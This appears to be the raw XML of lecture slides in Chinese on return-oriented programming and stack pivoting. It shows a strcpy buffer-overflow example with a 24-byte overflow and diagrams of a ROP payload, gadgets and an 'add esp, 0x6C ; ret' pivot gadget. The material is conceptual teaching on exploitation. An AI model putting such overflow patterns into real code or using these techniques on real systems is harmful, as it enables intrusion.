                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// 536-512=24 bytes overflow!</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy(dst, user);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4166A8-2019-448D-8F6E-ADD095C7D961}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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739"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1741" name="Shape 1741"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="3373667"/>
            <a:ext cx="2095200" cy="9988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1742" name="Shape 1742"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="4372667"/>
            <a:ext cx="20952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pivot gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1743" name="Shape 1743"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2964067"/>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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1744" name="Shape 1744"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="4307867"/>
            <a:ext cx="30004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add esp, 0x6C ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1745" name="Shape 1745"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2554467"/>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1746" name="Shape 1746"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="2489667"/>
            <a:ext cx="30004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ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1747" name="Shape 1747"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2144867"/>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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1748" name="Shape 1748"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1742" idx="1"/>
            <a:endCxn id="1744" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378633" y="4577467"/>
            <a:ext cx="1770000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749" name="Shape 1749"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540000" y="2259867"/>
            <a:ext cx="539200" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1750" name="Shape 1750"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1749" idx="1"/>
            <a:endCxn id="1746" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378400" y="2759267"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1751" name="Shape 1751"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="4567967"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1752" name="Shape 1752"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="4772767"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1753" name="Shape 1753"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="5259700"/>
            <a:ext cx="3000400" cy="539200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1754" name="Shape 1754"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1753" idx="0"/>
            <a:endCxn id="1744" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="4846900"/>
            <a:ext cx="0" cy="412800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1755" name="Shape 1755"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1744" idx="0"/>
            <a:endCxn id="1746" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="3028667"/>
            <a:ext cx="0" cy="1279200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 1732">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD42AE5-2170-433F-8ECE-6A883123F574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030877" y="870178"/>
            <a:ext cx="1419246" cy="58477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zh-CN" altLang="en-US" sz="2400" kern="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9670FB9E-443C-4F18-AD8C-31724769155C}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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1" name="Shape 1761"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="3373667"/>
            <a:ext cx="2095200" cy="9988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0x6c bytes</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1762" name="Shape 1762"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="4372667"/>
            <a:ext cx="20952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pivot gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1763" name="Shape 1763"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2964067"/>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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1764" name="Shape 1764"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="4307867"/>
            <a:ext cx="3000400" cy="539200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add esp, 0x6C ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1765" name="Shape 1765"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2554467"/>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1766" name="Shape 1766"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="2489667"/>
            <a:ext cx="30004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ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1767" name="Shape 1767"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148633" y="2144867"/>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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1768" name="Shape 1768"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1762" idx="1"/>
            <a:endCxn id="1764" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378633" y="4577467"/>
            <a:ext cx="1770000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1769" name="Shape 1769"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540000" y="2259867"/>
            <a:ext cx="539200" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1770" name="Shape 1770"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1769" idx="1"/>
            <a:endCxn id="1766" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5378400" y="2759267"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1771" name="Shape 1771"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="4161567"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1772" name="Shape 1772"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="4366367"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1773" name="Shape 1773"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="5259700"/>
            <a:ext cx="30004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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1774" name="Shape 1774"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1773" idx="0"/>
            <a:endCxn id="1764" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="4846900"/>
            <a:ext cx="0" cy="412800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1775" name="Shape 1775"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1764" idx="0"/>
            <a:endCxn id="1766" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3878367" y="3028667"/>
            <a:ext cx="0" cy="1279200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 1732">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E288A163-7310-4EB1-894C-69C1D1E87646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="869950"/>
            <a:ext cx="1419225" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BFA75C4-1DCB-4F34-B3C6-622B49CD0511}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
